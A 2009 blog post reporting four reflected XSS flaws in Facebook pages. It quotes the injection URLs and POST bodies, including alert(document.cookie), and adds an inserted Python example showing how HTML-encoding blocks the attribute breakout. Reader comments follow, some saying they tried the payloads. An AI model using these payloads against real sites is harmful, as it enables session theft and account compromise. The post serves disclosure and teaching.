More Facebook Xss Hacking 2009

[Image: Facebook's new homepage features a login form (via Wikipedia)]

I have previously written about security flaws Facebook has faced, such as how to view private Facebook profile pictures; several more Facebook security flaws were discovered between late 2008 and January 2009. And I'm pretty sure there will be more Facebook XSS hacking in 2009. Several major Facebook XSS vulnerabilities have been published on Xssed.com (the best-known website for XSS news). And of course, you're welcome to leave this post if you still think XSS is not dangerous at all :). A critical Facebook XSS flaw could infect millions of Facebook members with malware, and under these circumstances it is not impossible for a new Facebook XSS worm to be developed.

The first Facebook XSS vulnerability occurred on the Facebook reset password page:
XSS:
http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Mirror: http://www.xssed.com/mirror/55951/

The 2nd (with POST):
https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F

POST:

email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

The 3rd:
http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E

The 4th (with POST):
http://developers.facebook.com/tools.php?fbml

POST:

profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=
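All four entries above are the same bug class: a request parameter (`locale`, `email`, `tag`, `api_key`) is reflected into the page without HTML encoding, so a `">` closes the attribute the value sits in and whatever follows is parsed as markup. The following is an added example, not code from the original post or from Facebook: it decodes the first URL quoted above, renders it through a hypothetical vulnerable template that interpolates `locale` raw into an attribute, and then through the hardened version that HTML-encodes the value first. The template, the function names and the `<input>` markup are assumptions for illustration; the only page-specific input is the reset.php URL.

```python
"""Reflected XSS: raw interpolation versus HTML encoding (added example).

The server-side template below is hypothetical; it stands in for any page
that echoes a query parameter into an HTML attribute.
"""
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed from the first URL quoted in the post (reset.php, locale parameter).
REFLECTED_URL = (
    "http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)"
    "%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E"
)

# Matches an opening <script tag; closing </script> tags do not match.
SCRIPT_OPEN = re.compile(r"<script\b", re.IGNORECASE)


def locale_from_url(url: str) -> str:
    """Return the decoded ``locale`` parameter exactly as the server sees it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("locale", [""])[0]


def render_vulnerable(locale: str) -> str:
    """Hypothetical vulnerable template: the value is placed in the attribute as-is.

    A value containing '">' terminates the attribute and the element, and the
    rest of the value is parsed by the browser as new markup.
    """
    return '<input type="hidden" name="locale" value="%s">' % locale


def render_escaped(locale: str) -> str:
    """Hardened template: HTML-encode before inserting into a quoted attribute.

    html.escape(quote=True) turns '"' into '&quot;' and '<' into '&lt;', so the
    attribute can no longer be closed early and no tag is created.
    """
    return '<input type="hidden" name="locale" value="%s">' % html.escape(locale, quote=True)


def injected_script_count(markup: str) -> int:
    """Number of <script openings in rendered output; the check a reviewer would run."""
    return len(SCRIPT_OPEN.findall(markup))


if __name__ == "__main__":
    loc = locale_from_url(REFLECTED_URL)
    print("decoded parameter:", loc)
    print("vulnerable render:", render_vulnerable(loc),
          "-> script tags:", injected_script_count(render_vulnerable(loc)))
    print("escaped render:   ", render_escaped(loc),
          "-> script tags:", injected_script_count(render_escaped(loc)))
```

The same encoding step fixes the POST variants: the `email` and `api_key` values are reflected into page markup in exactly the same way, and context-appropriate output encoding (attribute, element body, or JavaScript string, depending on where the value lands) is the fix in each case, regardless of whether the value arrived by GET or POST.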




7 Responses to “More Facebook Xss Hacking 2009”

  1. I downloaded mozilla firefox and tried entering the private Id as instructed but It keeps saying that I have an invalid Id?
    Help!!

  2. One more reason to use a mac ;)

  3. uhm, you have to run exe, you retards. It wouldn't matter what platform you were using.

  4. ok, so i think the big question is... how do we fix this?!

  5. em.. you can call me to fix it.

    I can help with development of facebook

  6. I actually think hack 2 and 4 have been fixed.

  7. i tried all of them.. so far doesn't work.. =(
